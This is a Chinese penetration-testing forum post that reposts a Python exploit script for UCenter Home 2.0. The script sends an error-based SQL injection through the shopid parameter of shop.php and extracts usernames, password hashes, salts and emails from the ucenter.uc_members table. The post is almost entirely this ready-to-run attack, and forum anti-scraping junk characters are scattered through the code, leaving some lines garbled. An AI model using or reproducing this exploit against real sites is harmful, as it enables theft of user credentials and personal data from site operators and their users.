找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2382|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
* V* G5 i9 b; z& {: v# a4 T" A # Q) B0 r! h5 c6 a, F* B4 b
  X( Y# c7 u. V7 I) V
#!/usr/bin/env python  
8 G1 s7 x, l3 A8 W" N! Y
6 Z! z- o! D+ r" y- ^import sys  
: C; Q5 ?6 k) zimport urllib2  
! C! f0 I0 g. b2 J; {+ ^: Wimport re  
7 G+ |% f1 j6 z! g* E( v + c* A: R/ W+ q& X& p- u- X
def info():  
; Z8 a+ Q$ ]8 n    print 'From:http://www.exploit-db.com/exploits/14997/' # }+ f# I  b! _. ]
    print 'http://www.hake.cc/Web_loudong/'
3 {+ e4 S; Y9 S, j# O4 |& b  L    print 'changed:qiaoy'  
( y7 ?- i9 |0 i! z+ i" S    print 'exp:'  
# ^) W5 M0 j, Q' A  E    print ' ./UCenter_Home_2.0.py site'  * O, Y1 O5 `: O% L; \/ t+ w
1 b; R" s. i9 q
def main():  7 e7 K9 }  T$ @! R
    if len(sys.argv) != 2:  6 ]- D3 E0 h8 P. J5 Q
        info()  
) L3 b5 ~/ L2 x6 @  W5 ~3 Q/ D    else:  
# ?  A. `5 x( g" p3 g+ E        site = sys.argv[1]  - Y6 N1 ?, o0 _* r3 Y' X
        if site[0:7] == 'http://':  ( S+ v1 L, _: U9 `0 x
            sitesite =site  
9 `5 L4 i9 t1 `0 \: ^        elif site[0:8] == 'https://':  
# }" D2 q- q/ @+ |$ p            sitesite = site  6 o7 ^& i( r- D; {9 T5 H
        else:  
# f1 m+ v. z4 s: b; q5 J+ W& a            site = 'http://'+site  8 j- Z* I& t2 l# k4 k
        try:  2 m$ ]* a* V3 w0 k' p5 e8 g' p
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  8 g. D& E6 |0 t( u; A
            Value = urllib2.urlopen(url).read()  
$ Y- T. ]  n$ p' i            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
8 J. n# w( Z& ]4 [1 B& {            hacked = Msg.split(':')  2 S$ y4 z( H0 s5 V
            print 'Name:    '+hacked[1]  ! G. b! ?; [* f' R/ I. c
            print 'Passwd:  '+hacked[2]  
( ]6 ]* r4 c, X2 r9 y2 A# ^5 ]' s            print 'salt:    '+hacked[3]  9 g1 D- s% R1 H, T
            print 'email:   '+hacked[4]  & }7 ^$ @+ b( b8 Q4 i7 n' F0 h
        except:  ) |- ~8 \$ t4 L9 d
            print 'Sorry,I can\'t work............'  9 w2 |, R) i" t6 W
6 P$ B: h2 q( M7 `3 g- G: G0 h& A
if __name__ == '__main__':  % b, b# P. `# G0 A" g0 N
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表